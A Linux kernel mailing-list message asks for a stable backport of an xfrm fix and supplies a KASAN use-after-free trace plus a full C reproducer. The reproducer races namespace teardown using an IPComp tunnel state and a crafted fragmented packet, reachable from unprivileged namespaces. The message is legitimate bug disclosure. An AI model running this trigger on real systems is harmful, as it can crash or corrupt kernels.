All of lore.kernel.org
 help / color / mirror / Atom feed
From: Slavin Liu <slavin452@gmail.com>
To: stable@vger.kernel.org
Cc: Sabrina Dubroca <sd@queasysnail.net>,
	Steffen Klassert <steffen.klassert@secunet.com>,
	"netdev@vger.kernel.org" <netdev@vger.kernel.org>
Subject: Re: [BUG] Missing backport for commit b441cf3f8c4b ("xfrm: delete x->tunnel as we delete x")
Date: Sun, 30 Nov 2025 02:24:07 +0800	[thread overview]
Message-ID: <20251129182407.1064-1-slavin452@gmail.com> (raw)
In-Reply-To: <20251118151140.89427-1-slavin452@gmail.com>

Hi all,

Just a gentle follow-up on this backport request, now with a KASAN report
and a reproducer.

1. KASAN Report
BUG: KASAN: slab-use-after-free in __hlist_del include/linux/list.h:988 [inline]
BUG: KASAN: slab-use-after-free in hlist_del_rcu include/linux/rculist.h:516 [inline]
BUG: KASAN: slab-use-after-free in __xfrm_state_delete+0x7bb/0x8e0 net/xfrm/xfrm_state.c:761
Write of size 8 at addr ffff88802eba0418 by task kworker/0:5/397627

CPU: 0 UID: 0 PID: 397627 Comm: kworker/0:5 Tainted: 6.12.51 #2
Tainted: [W]=WARN
Workqueue: events xfrm_state_gc_task
Call Trace:
 <TASK>
 __dump_stack lib/dump_stack.c:94 [inline]
 dump_stack_lvl+0xd7/0x130 lib/dump_stack.c:120
 print_address_description mm/kasan/report.c:377 [inline]
 print_report+0xc4/0x640 mm/kasan/report.c:481
 kasan_report+0xd8/0x110 mm/kasan/report.c:594
 __hlist_del include/linux/list.h:988 [inline]
 hlist_del_rcu include/linux/rculist.h:516 [inline]
 __xfrm_state_delete+0x7bb/0x8e0 net/xfrm/xfrm_state.c:761
 xfrm_state_delete net/xfrm/xfrm_state.c:795 [inline]
 xfrm_state_delete_tunnel+0x17c/0x1b0 net/xfrm/xfrm_state.c:3014
 ipcomp_destroy+0x4a/0xc0 net/xfrm/xfrm_ipcomp.c:318
 ___xfrm_state_destroy+0x252/0x5c0 net/xfrm/xfrm_state.c:549
 xfrm_state_gc_task+0x111/0x180 net/xfrm/xfrm_state.c:572
 process_one_work+0x8e3/0x1930 kernel/workqueue.c:3229
 process_scheduled_works kernel/workqueue.c:3310 [inline]
 worker_thread+0x781/0x10a0 kernel/workqueue.c:3391
 kthread+0x2fa/0x400 kernel/kthread.c:389
 ret_from_fork+0x4a/0x80 arch/x86/kernel/process.c:152
 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:244
 </TASK>

Allocated by task 9:
 kasan_save_stack+0x33/0x60 mm/kasan/common.c:47
 kasan_save_track+0x14/0x30 mm/kasan/common.c:68
 poison_kmalloc_redzone mm/kasan/common.c:377 [inline]
 __kasan_kmalloc+0x8f/0xa0 mm/kasan/common.c:394
 kasan_kmalloc include/linux/kasan.h:260 [inline]
 __do_kmalloc_node mm/slub.c:4313 [inline]
 __kmalloc_noprof+0x219/0x530 mm/slub.c:4325
 kmalloc_noprof include/linux/slab.h:882 [inline]
 kzalloc_noprof include/linux/slab.h:1014 [inline]
 xfrm_hash_alloc+0xd6/0x100 net/xfrm/xfrm_hash.c:21
 xfrm_hash_resize+0x66/0x2310 net/xfrm/xfrm_state.c:170
 [...]

Freed by task 30:
 kasan_save_stack+0x33/0x60 mm/kasan/common.c:47
 kasan_save_track+0x14/0x30 mm/kasan/common.c:68
 kasan_save_free_info+0x3b/0x60 mm/kasan/generic.c:579
 poison_slab_object mm/kasan/common.c:247 [inline]
 __kasan_slab_free+0x37/0x50 mm/kasan/common.c:264
 kasan_slab_free include/linux/kasan.h:233 [inline]
 slab_free_hook mm/slub.c:2374 [inline]
 slab_free mm/slub.c:4632 [inline]
 kfree+0x14a/0x4a0 mm/slub.c:4780
 xfrm_hash_free+0xc1/0xe0 net/xfrm/xfrm_hash.c:35
 xfrm_state_fini+0x226/0x310 net/xfrm/xfrm_state.c:3233
 xfrm_net_exit+0x32/0x70 net/xfrm/xfrm_policy.c:4342
 ops_exit_list+0xb5/0x180 net/core/net_namespace.c:173
 cleanup_net+0x5b8/0xb20 net/core/net_namespace.c:642
 [...]

2. Reproducer
The C reproducer is pasted below.

Given that this UAF is reproducible and reachable from unprivileged
namespaces (if unshare is allowed), I suggest backporting commit
b441cf3f8c4b to all active LTS branches.

Thanks,
Slavin Liu

---
repro.c:

// gcc repro.c -o poc -lz
#define _GNU_SOURCE
#include <arpa/inet.h>
#include <errno.h>
#include <fcntl.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <linux/xfrm.h>
#include <net/if.h>
#include <netinet/in.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#include <netinet/ip.h>
#include <zlib.h>

// =-=-=-=-=-=-=-= CONFIG =-=-=-=-=-=-=-=
// Host-order identifier of the IPComp SA: passed as htonl(SPI) for the SA's
// spi and as htons(SPI) for the CPI field of the crafted IPComp header.
#define SPI 0x1100
// Outer (tunnel) IPv4 source address, used both for the SA and for the
// outer header of the crafted packet.
#define TUNNEL_SRC "172.16.22.148"
// Outer (tunnel) IPv4 destination address; also the sendto() destination.
#define TUNNEL_DST "172.16.194.141"

// =-=-=-=-=-=-=-= UTILS =-=-=-=-=-=-=-=
// Report `msg` together with the current errno text via perror() and
// terminate the process with EXIT_FAILURE. Wrapped in do/while(0) so it
// behaves as a single statement after an unbraced `if`.
#define die(msg) do { perror(msg); exit(EXIT_FAILURE); } while(0)

/*
 * Write the NUL-terminated string `buf` (without its terminator) to the
 * already-existing file `filename` with a single write() call.
 *
 * The file is opened write-only with O_CLOEXEC and is not created if
 * missing. Any open failure, write error or short write terminates the
 * process through die().
 */
void write_file(const char * filename, const char * buf) {
    const int out_fd = open(filename, O_WRONLY | O_CLOEXEC);

    if (out_fd < 0)
        die("open");

    const size_t expected = strlen(buf);
    const ssize_t written = write(out_fd, buf, expected);

    /* A negative result (error) and a short write are both fatal. */
    if (written < 0 || (size_t)written != expected)
        die("write");

    close(out_fd);
}

/*
 * Move the process into new user, mount, network and IPC namespaces and
 * map the caller's real uid/gid to id 0 inside the new user namespace.
 * This allows an unprivileged user to configure XFRM interfaces and rules.
 *
 * /proc/self/setgroups is set to "deny" before gid_map is written
 * (see user_namespaces(7) for why that ordering is needed).
 *
 * Any failure terminates the process through die().
 */
static void init_namespace(void) {
    char uid_map[128];
    char gid_map[128];
    const uid_t uid = getuid();
    const gid_t gid = getgid();

    if (unshare(CLONE_NEWUSER | CLONE_NEWNS | CLONE_NEWNET | CLONE_NEWIPC))
        die("unshare");

    /*
     * uid_t/gid_t are unsigned: format them with %u, and bound the write
     * to the destination buffer.
     */
    snprintf(uid_map, sizeof(uid_map), "0 %u 1\n", (unsigned int)uid);
    snprintf(gid_map, sizeof(gid_map), "0 %u 1\n", (unsigned int)gid);

    write_file("/proc/self/uid_map", uid_map);
    write_file("/proc/self/setgroups", "deny");
    write_file("/proc/self/gid_map", gid_map);
}

/*
 * Set IFF_UP on the network interface named `ifname`.
 *
 * The current flags are first read with SIOCGIFFLAGS so that only IFF_UP
 * is added and every other flag is written back unchanged. A temporary
 * AF_INET datagram socket is used as the ioctl handle and closed before
 * returning. Any failure terminates the process through die().
 */
static void bring_interface_up(const char *ifname)
{
    int sockfd = socket(AF_INET, SOCK_DGRAM, 0);
    if (sockfd < 0) die("socket");

    struct ifreq ifr;
    memset(&ifr, 0, sizeof ifr);
    /* ifr is zeroed and at most IFNAMSIZ - 1 bytes are copied, so the
     * name is always NUL-terminated. */
    strncpy(ifr.ifr_name, ifname, IFNAMSIZ - 1);

    /* Read-modify-write: fetch the existing flags before OR-ing in IFF_UP. */
    if (ioctl(sockfd, SIOCGIFFLAGS, &ifr) < 0) die("SIOCGIFFLAGS");
    ifr.ifr_flags |= IFF_UP;
    if (ioctl(sockfd, SIOCSIFFLAGS, &ifr) < 0) die("SIOCSIFFLAGS");

    close(sockfd);
}

// =-=-=-=-=-=-=-= XFRM UTILS =-=-=-=-=-=-=-=
// NETLINK_XFRM socket shared by the XFRM helpers: assigned in
// setup_xfrm_env() and used by xfrm_add_sa_tunnel_ipcomp_v4() to send.
int nlfd;

/*
 * Add an IPv4 address to an interface through rtnetlink.
 *
 * Sends a single RTM_NEWADDR request (create + exclusive + ack) carrying
 * one IFA_LOCAL attribute, then reads one reply and checks it.
 *
 * ifname:     interface name, resolved with if_nametoindex().
 * ip:         dotted-quad IPv4 address.
 * prefix_len: prefix length stored in ifa_prefixlen.
 *
 * Returns 0 on success. Every failure (unknown interface, unparsable
 * address, socket error, malformed reply, or a netlink error reply)
 * terminates the process through die(); errno is set so that the
 * perror() text describes the actual cause.
 */
int add_ip_address(const char *ifname, const char *ip, int prefix_len) {
    struct {
        struct nlmsghdr n;
        struct ifaddrmsg ifa;
        char buf[256];
    } req;
    /* A union gives the receive buffer nlmsghdr alignment. */
    union {
        struct nlmsghdr hdr;
        char raw[4096];
    } reply;
    struct sockaddr_nl nladdr;
    struct rtattr *rta;
    struct in_addr addr;
    unsigned int ifindex;
    ssize_t len;
    int sockfd;

    ifindex = if_nametoindex(ifname);
    if (ifindex == 0) die("if_nametoindex");

    if (inet_pton(AF_INET, ip, &addr) != 1) {
        /* inet_pton() returns 0 without touching errno on bad text. */
        errno = EINVAL;
        die("Invalid IP address");
    }

    sockfd = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
    if (sockfd < 0) die("socket");

    memset(&req, 0, sizeof(req));
    req.n.nlmsg_len = NLMSG_LENGTH(sizeof(struct ifaddrmsg));
    req.n.nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE | NLM_F_EXCL | NLM_F_ACK;
    req.n.nlmsg_type = RTM_NEWADDR;

    req.ifa.ifa_family = AF_INET;
    req.ifa.ifa_prefixlen = prefix_len;
    req.ifa.ifa_flags = IFA_F_PERMANENT;
    req.ifa.ifa_scope = RT_SCOPE_UNIVERSE;
    req.ifa.ifa_index = ifindex;

    /* Append the IFA_LOCAL attribute right after the aligned fixed part. */
    rta = (struct rtattr *)(((char *)&req) + NLMSG_ALIGN(req.n.nlmsg_len));
    rta->rta_type = IFA_LOCAL;
    rta->rta_len = RTA_LENGTH(sizeof(addr));
    memcpy(RTA_DATA(rta), &addr, sizeof(addr));
    req.n.nlmsg_len = NLMSG_ALIGN(req.n.nlmsg_len) + rta->rta_len;

    memset(&nladdr, 0, sizeof(nladdr));
    nladdr.nl_family = AF_NETLINK;

    if (sendto(sockfd, &req, req.n.nlmsg_len, 0,
               (struct sockaddr *)&nladdr, sizeof(nladdr)) < 0)
        die("sendto");

    len = recv(sockfd, reply.raw, sizeof(reply.raw), 0);
    if (len < 0) die("recv");

    /* Reject truncated or inconsistent replies before reading any field. */
    if (!NLMSG_OK(&reply.hdr, len)) {
        errno = EBADMSG;
        die("recv");
    }

    if (reply.hdr.nlmsg_type == NLMSG_ERROR) {
        struct nlmsgerr *err;

        if (reply.hdr.nlmsg_len < NLMSG_LENGTH(sizeof(*err))) {
            errno = EBADMSG;
            die("recv");
        }
        err = (struct nlmsgerr *)NLMSG_DATA(&reply.hdr);
        if (err->error != 0) {
            /* The reply carries a negated errno; expose it to perror(). */
            errno = -err->error;
            die("Netlink error");
        }
    }

    close(sockfd);
    return 0;
}

/*
 * Prepare the loopback interface for the test traffic:
 *   - assign 10.0.0.0/8 and 172.16.0.0/12 to "lo";
 *   - write the sysctl values listed below, in order: rp_filter off and
 *     accept_local on (for "lo" and "all"), and disable_xfrm /
 *     disable_policy cleared on "lo" so IPComp processing is allowed.
 *
 * Failures are fatal inside the helpers that are called.
 */
static void configure_lo()
{
    static const struct {
        const char *path;
        const char *value;
    } settings[] = {
        { "/proc/sys/net/ipv4/conf/lo/rp_filter",       "0"   },
        { "/proc/sys/net/ipv4/conf/all/rp_filter",      "0"   },
        { "/proc/sys/net/ipv4/conf/lo/accept_local",    "1"   },
        { "/proc/sys/net/ipv4/conf/all/accept_local",   "1"   },
        /* Enable xfrm on lo to allow IPComp processing */
        { "/proc/sys/net/ipv4/conf/lo/disable_xfrm",    "0\n" },
        { "/proc/sys/net/ipv4/conf/lo/disable_policy",  "0\n" },
    };
    size_t idx;

    add_ip_address("lo", "10.0.0.0", 8);
    add_ip_address("lo", "172.16.0.0", 12);

    for (idx = 0; idx < sizeof(settings) / sizeof(settings[0]); idx++)
        write_file(settings[idx].path, settings[idx].value);
}

/*
 * Open a raw NETLINK_XFRM socket, bind it with nl_pid set to this
 * process's pid, and connect it to nl_pid 0 so later send() calls need
 * no destination address.
 *
 * Returns the socket descriptor. Any failing step terminates the process
 * through die().
 */
static int nl_open_xfrm(void)
{
    struct sockaddr_nl local;
    struct sockaddr_nl peer;
    int sock;

    sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM);
    if (sock < 0)
        die("socket");

    memset(&local, 0, sizeof(local));
    local.nl_family = AF_NETLINK;
    local.nl_pid = (uint32_t)getpid();
    if (bind(sock, (struct sockaddr *)&local, sizeof(local)) < 0)
        die("bind");

    /* nl_pid stays 0 for the peer address. */
    memset(&peer, 0, sizeof(peer));
    peer.nl_family = AF_NETLINK;
    if (connect(sock, (struct sockaddr *)&peer, sizeof(peer)) < 0)
        die("connect");

    return sock;
}

/*
 * Build and send one XFRM_MSG_NEWSA request on the global `nlfd` socket
 * describing an IPv4 IPComp state in tunnel mode with the "deflate"
 * compression algorithm.
 * (Per the accompanying report, installing this state is what makes the
 * kernel allocate 'x->tunnel'.)
 *
 * saddr_be / daddr_be:           selector (inner) addresses, /32 each.
 * spi_be:                        value stored in the state's id.spi.
 * tunnel_src_be / tunnel_dst_be: outer addresses of the state.
 * All arguments are stored as given; callers pass network byte order.
 *
 * The request asks for an ACK, but no reply is read here. A send()
 * failure terminates the process through die().
 */
static void xfrm_add_sa_tunnel_ipcomp_v4(uint32_t saddr_be, 
                uint32_t daddr_be, uint32_t spi_be, 
                uint32_t tunnel_src_be, uint32_t tunnel_dst_be)
{
    /* Fixed xfrm_usersa_info payload followed by one XFRMA_ALG_COMP
     * attribute that carries a key-less struct xfrm_algo. */
    char msg[NLMSG_SPACE(sizeof(struct xfrm_usersa_info)) +
             NLA_ALIGN(NLA_HDRLEN + sizeof(struct xfrm_algo) + 0)];
    struct nlmsghdr *hdr = (struct nlmsghdr *)msg;
    struct xfrm_usersa_info *info;
    struct nlattr *attr;
    struct xfrm_algo *comp;
    size_t attr_off;

    /* Everything not assigned below stays zero. */
    memset(msg, 0, sizeof(msg));

    /* Netlink header. */
    hdr->nlmsg_len   = NLMSG_LENGTH(sizeof(*info));
    hdr->nlmsg_type  = XFRM_MSG_NEWSA;
    hdr->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE | NLM_F_EXCL;
    hdr->nlmsg_seq   = 1;
    hdr->nlmsg_pid   = (uint32_t)getpid();

    /* State identity and outer addresses. */
    info = (struct xfrm_usersa_info *)NLMSG_DATA(hdr);
    info->family      = AF_INET;
    info->mode        = XFRM_MODE_TUNNEL;
    info->id.proto    = IPPROTO_COMP;
    info->id.spi      = spi_be;
    info->id.daddr.a4 = tunnel_dst_be;
    info->saddr.a4    = tunnel_src_be;
    info->replay_window = 0;

    /* Selector: exact host-to-host match on the inner addresses. */
    info->sel.family      = AF_INET;
    info->sel.saddr.a4    = saddr_be;
    info->sel.daddr.a4    = daddr_be;
    info->sel.prefixlen_s = 32;
    info->sel.prefixlen_d = 32;

    /* No lifetime limits of any kind. */
    info->lft.soft_byte_limit          = XFRM_INF;
    info->lft.hard_byte_limit          = XFRM_INF;
    info->lft.soft_packet_limit        = XFRM_INF;
    info->lft.hard_packet_limit        = XFRM_INF;
    info->lft.soft_add_expires_seconds = XFRM_INF;
    info->lft.hard_add_expires_seconds = XFRM_INF;
    info->lft.soft_use_expires_seconds = XFRM_INF;
    info->lft.hard_use_expires_seconds = XFRM_INF;

    /* Compression-algorithm attribute, placed after the aligned payload. */
    attr_off = NLMSG_ALIGN(hdr->nlmsg_len);
    attr = (struct nlattr *)(msg + attr_off);
    comp = (struct xfrm_algo *)((char *)attr + NLA_HDRLEN);

    attr->nla_type = XFRMA_ALG_COMP;
    attr->nla_len  = NLA_HDRLEN + sizeof(*comp);

    snprintf(comp->alg_name, sizeof(comp->alg_name), "%s", "deflate");
    comp->alg_key_len = 0;

    hdr->nlmsg_len = attr_off + NLA_ALIGN(attr->nla_len);

    if (send(nlfd, hdr, hdr->nlmsg_len, 0) < 0)
        die("send");
}

/*
 * One-shot environment setup for the calling process: enter the new
 * namespaces, bring "lo" up, configure its addresses and sysctls, and
 * open the NETLINK_XFRM socket stored in the global `nlfd`.
 */
void setup_xfrm_env() {
    int xfrm_sock;

    init_namespace();
    bring_interface_up("lo");
    configure_lo();

    xfrm_sock = nl_open_xfrm();
    if (xfrm_sock < 0)
        die("nl_open_xfrm");
    nlfd = xfrm_sock;
}

// =-=-=-=-=-=-=-= PACKET CONSTRUCTION =-=-=-=-=-=-=-=

/*
 * Compute the 16-bit one's-complement checksum over an IPv4 header.
 *
 * iph: header to sum; iph->ihl * 4 bytes are read starting at `iph`, so
 *      the caller must provide that many readable bytes (options
 *      included when ihl > 5). iph->check must be 0 when generating a
 *      checksum; summing a header whose check field is already correct
 *      yields 0.
 *
 * Returns the checksum in the same byte order as the words were read, so
 * the value can be stored directly into iph->check.
 *
 * The 16-bit words are loaded with memcpy() rather than through a
 * uint16_t pointer, which avoids aliasing and alignment problems. The
 * header length is always a multiple of 4, so no odd trailing byte can
 * occur.
 */
uint16_t ip_checksum(struct iphdr *iph) {
    const unsigned char *bytes = (const unsigned char *)iph;
    const size_t hdr_len = (size_t)iph->ihl * 4;
    uint32_t sum = 0;
    size_t off;

    for (off = 0; off < hdr_len; off += sizeof(uint16_t)) {
        uint16_t word;

        memcpy(&word, bytes + off, sizeof(word));
        sum += word;
    }

    /* Fold the carries back into the low 16 bits (twice covers the
     * carry produced by the first fold). */
    sum = (sum >> 16) + (sum & 0xffff);
    sum += (sum >> 16);
    return (uint16_t)~sum;
}

/*
 * 4-byte header placed between the outer IPv4 header and the compressed
 * payload of the crafted packet.
 */
struct ipcomp_hdr {
    uint8_t  nexthdr;   /* protocol of the decompressed payload */
    uint8_t  flags;     /* written as 0 by this program */
    uint16_t cpi;       /* stored in network byte order (htons(SPI) here) */
};

/*
 * Compress `in_len` bytes from `in` into `out` as a raw deflate stream
 * (no zlib header) in a single Z_FINISH pass.
 *
 * out_len: in  - capacity of `out` in bytes;
 *          out - number of bytes produced (only updated on success).
 *
 * Returns 0 on success, -1 if zlib initialisation fails or the whole
 * input could not be compressed into `out` in one call.
 */
static int deflate_raw(const void *in, size_t in_len, void *out, size_t *out_len)
{
    z_stream zs;
    int status = -1;

    memset(&zs, 0, sizeof(zs));

    /* Arguments after the stream: level, method, windowBits, memLevel,
     * strategy. Negative windowBits (-15) selects raw deflate. */
    if (deflateInit2(&zs, Z_DEFAULT_COMPRESSION, Z_DEFLATED,
                     -15, 8, Z_DEFAULT_STRATEGY) != Z_OK)
        return -1;

    zs.next_in   = (Bytef *)in;
    zs.avail_in  = (uInt)in_len;
    zs.next_out  = (Bytef *)out;
    zs.avail_out = (uInt)*out_len;

    if (deflate(&zs, Z_FINISH) == Z_STREAM_END) {
        *out_len = zs.total_out;
        status = 0;
    }

    /* Single release point for both outcomes. */
    deflateEnd(&zs);
    return status;
}

/*
 * Serialise an option-less IPv4 header followed by `payload` into `buf`.
 *
 * buf, buf_cap:  destination buffer and its capacity in bytes.
 * src, dst:      dotted-quad source / destination addresses.
 * id:            IP identification field (host order).
 * proto:         value for the protocol field.
 * frag_flags_off: complete flags + fragment-offset field (host order).
 * payload, payload_len: bytes copied after the header; `payload` may be
 *                NULL when payload_len is 0.
 *
 * Returns the total packet length, or 0 if the packet does not fit in
 * `buf` or would exceed the 16-bit IPv4 total-length field.
 */
static size_t build_inner_ipv4_packet(uint8_t *buf, size_t buf_cap,
                                      const char *src, const char *dst,
                                      uint16_t id, uint8_t proto,
                                      uint16_t frag_flags_off,
                                      const void *payload, size_t payload_len)
{
    enum { IPV4_TOT_LEN_MAX = 0xffff };
    const size_t hdr_len = sizeof(struct iphdr);

    /* Subtract instead of add so a huge payload_len cannot wrap. */
    if (buf_cap < hdr_len || payload_len > buf_cap - hdr_len) return 0;
    /* tot_len is 16 bits wide: refuse rather than silently truncate. */
    if (payload_len > (size_t)IPV4_TOT_LEN_MAX - hdr_len) return 0;

    const size_t total_len = hdr_len + payload_len;

    struct iphdr *iph = (struct iphdr *)buf;
    memset(iph, 0, sizeof(*iph));
    iph->version  = 4;
    iph->ihl      = 5;
    iph->tos      = 0;
    iph->tot_len  = htons((uint16_t)total_len);
    iph->id       = htons(id);
    iph->frag_off = htons(frag_flags_off);
    iph->ttl      = 64;
    iph->protocol = proto;
    iph->saddr    = inet_addr(src);
    iph->daddr    = inet_addr(dst);
    /* The checksum is computed last, over the header with check == 0. */
    iph->check    = 0;
    iph->check    = ip_checksum(iph);

    if (payload_len != 0)
        memcpy(buf + hdr_len, payload, payload_len);
    return total_len;
}

// Number of payload bytes carried by the inner (pre-compression) IPv4 packet.
#define INNER_PAY_SZ 1400

/*
 * Sends a crafted packet:
 * Outer: IP -> IPComp (Tunnel Mode)
 * Inner: IP (Fragmented) -> UDP
 *
 * This forces the packet to enter the reassembly queue (gro_cells_receive)
 * after decompression, holding a ref to the IPComp state.
 *
 * Steps performed here: build the inner IPv4 fragment, deflate it, wrap
 * it in an outer IPv4 + IPComp header and send it once on a raw socket
 * with IP_HDRINCL set. Any failure terminates the process through die().
 * NOTE(review): the kernel-side effects described above come from the
 * accompanying report and are not observable from this code.
 */
void trigger_fragment_with_secpath() {
    int sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
    if (sock < 0) die("socket");

    int one = 1;
    if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &one, sizeof(one)) < 0)
        die("setsockopt IP_HDRINCL");

    // 1. Construct Inner IPv4 Packet (Fragmented: IP_MF set)
    uint8_t inner_payload[INNER_PAY_SZ];
    memset(inner_payload, 0xAA, sizeof(inner_payload));

    const uint16_t INNER_ID = 0x5678;
    const uint16_t INNER_FRAG_OFFSET = 1400;    // bytes
    // Set More Fragments (IP_MF) to ensure it stays in reassembly queue
    // (the byte offset is shifted right by 3 to express it in 8-byte units)
    const uint16_t inner_frag_off_field = IP_MF | (INNER_FRAG_OFFSET >> 3);

    uint8_t inner_packet[sizeof(struct iphdr) + INNER_PAY_SZ];
    size_t inner_packet_len = build_inner_ipv4_packet(
        inner_packet, sizeof(inner_packet),
        "10.0.0.2", "10.0.0.1",
        INNER_ID, IPPROTO_UDP,
        inner_frag_off_field,
        inner_payload, sizeof(inner_payload)
    );
    if (!inner_packet_len) die("inner packet too big");

    // 2. Compress the inner packet (IPComp payload)
    // comp_len carries the buffer capacity in and the compressed size out.
    uint8_t comp_buf[sizeof(inner_packet) + 128];
    size_t  comp_len = sizeof(comp_buf);
    if (deflate_raw(inner_packet, inner_packet_len, comp_buf, &comp_len) != 0) {
        die("deflate_raw failed");
    }

    // 3. Build outer packet: [outer IP][IPCOMP][compressed bytes]
    // The buffer is sized for the largest possible comp_buf; only
    // outer_len bytes of it are filled in and sent.
    uint8_t packet[sizeof(struct iphdr) + sizeof(struct ipcomp_hdr) + sizeof(comp_buf)];
    struct iphdr *outer_iph = (struct iphdr *)packet;

    outer_iph->version = 4;
    outer_iph->ihl     = 5;
    outer_iph->tos     = 0;
    size_t outer_len   = sizeof(struct iphdr) + sizeof(struct ipcomp_hdr) + comp_len;
    outer_iph->tot_len = htons(outer_len);
    outer_iph->id      = htons(0x1234);
    outer_iph->frag_off= htons(IP_DF);
    outer_iph->ttl     = 64;
    outer_iph->protocol= IPPROTO_COMP; // Trigger XFRM Input
    outer_iph->saddr   = inet_addr(TUNNEL_SRC);
    outer_iph->daddr   = inet_addr(TUNNEL_DST);
    outer_iph->check   = 0;

    struct ipcomp_hdr *ipcomp = (struct ipcomp_hdr *)(packet + sizeof(struct iphdr));
    ipcomp->nexthdr = IPPROTO_IPIP;    // decompressed payload is an IPv4 packet
    ipcomp->flags   = 0;
    ipcomp->cpi     = htons(SPI);

    memcpy(packet + sizeof(struct iphdr) + sizeof(struct ipcomp_hdr),
           comp_buf, comp_len);

    // Header checksum is computed last, with the check field still 0.
    outer_iph->check = ip_checksum(outer_iph);

    struct sockaddr_in dest = {
        .sin_family = AF_INET,
        .sin_addr.s_addr = inet_addr(TUNNEL_DST)
    };

    if (sendto(sock, packet, outer_len, 0,
               (struct sockaddr*)&dest, sizeof(dest)) < 0) {
        die("sendto");
    }
    close(sock);
}

// =-=-=-=-=-=-=-= MAIN =-=-=-=-=-=-=-=

/*
 * Entry point: repeat the trigger sequence forever, one short-lived child
 * process per iteration, until interrupted.
 *
 * Each child sets up its own namespaces, installs the IPComp state,
 * sends the crafted packet and exits. The parent reaps that child and
 * sleeps for one second before the next round. A fork() or waitpid()
 * failure terminates the program through die() instead of being
 * silently retried.
 */
int main(int argc, char **argv)
{
    (void)argc;
    (void)argv;

    printf("[*] Starting UAF Trigger Loop...\n");
    printf("[*] Ctrl+C to stop.\n");

    while (1) {
        // Fork a child process to run the trigger logic
        pid_t child = fork();
        if (child < 0) die("fork");

        if (child == 0) {
            // Child Process:

            // 1. Create isolated namespace
            setup_xfrm_env();

            uint32_t inner_src = inet_addr("10.0.0.1");
            uint32_t inner_dst = inet_addr("10.0.0.2");
            uint32_t tunnel_src = inet_addr(TUNNEL_SRC);
            uint32_t tunnel_dst = inet_addr(TUNNEL_DST);
            uint32_t spi = htonl(SPI);

            // 2. Add IPComp State (allocates x->tunnel)
            xfrm_add_sa_tunnel_ipcomp_v4(inner_src, inner_dst, spi,
                                         tunnel_src, tunnel_dst);

            // 3. Send packet to sit in reassembly queue (holds ref to xfrm_state)
            trigger_fragment_with_secpath();

            // 4. Exit immediately.
            // This triggers netns teardown:
            // -> ipv4_frags_exit_net (stops reassembly, schedules free work)
            // -> xfrm_net_exit (flushes state, freeing xfrm_hash)
            // If xfrm_state_fini() happens before skb in reassembly get
            // destroyed -> UAF.
            exit(0);
        }

        // Reap exactly the child started above, then pause before the
        // next round (presumably to give the netns cleanup time to run).
        if (waitpid(child, NULL, 0) < 0 && errno != EINTR)
            die("waitpid");
        sleep(1);
    }

    return 0;
}

  reply	other threads:[~2025-11-29 18:25 UTC|newest]

Thread overview: 5+ messages / expand[flat|nested]  mbox.gz  Atom feed  top
2025-11-18 15:11 [BUG] Missing backport for commit b441cf3f8c4b ("xfrm: delete x->tunnel as we delete x") Slavin Liu
2025-11-29 18:24 ` Slavin Liu [this message]
2025-12-01 11:14 ` Steffen Klassert
2025-12-09  1:06   ` Slavin Liu
2025-12-09  1:12     ` Greg KH

Reply instructions:

You may reply publicly to this message via plain-text email
using any one of the following methods:

* Save the following mbox file, import it into your mail client,
  and reply-to-all from there: mbox

  Avoid top-posting and favor interleaved quoting:
  https://en.wikipedia.org/wiki/Posting_style#Interleaved_style

* Reply using the --to, --cc, and --in-reply-to
  switches of git-send-email(1):

  git send-email \
    --in-reply-to=20251129182407.1064-1-slavin452@gmail.com \
    --to=slavin452@gmail.com \
    --cc=netdev@vger.kernel.org \
    --cc=sd@queasysnail.net \
    --cc=stable@vger.kernel.org \
    --cc=steffen.klassert@secunet.com \
    /path/to/YOUR_REPLY

  https://kernel.org/pub/software/scm/git/docs/git-send-email.html

* If your mail client supports setting the In-Reply-To header
  via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line before the message body.
This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.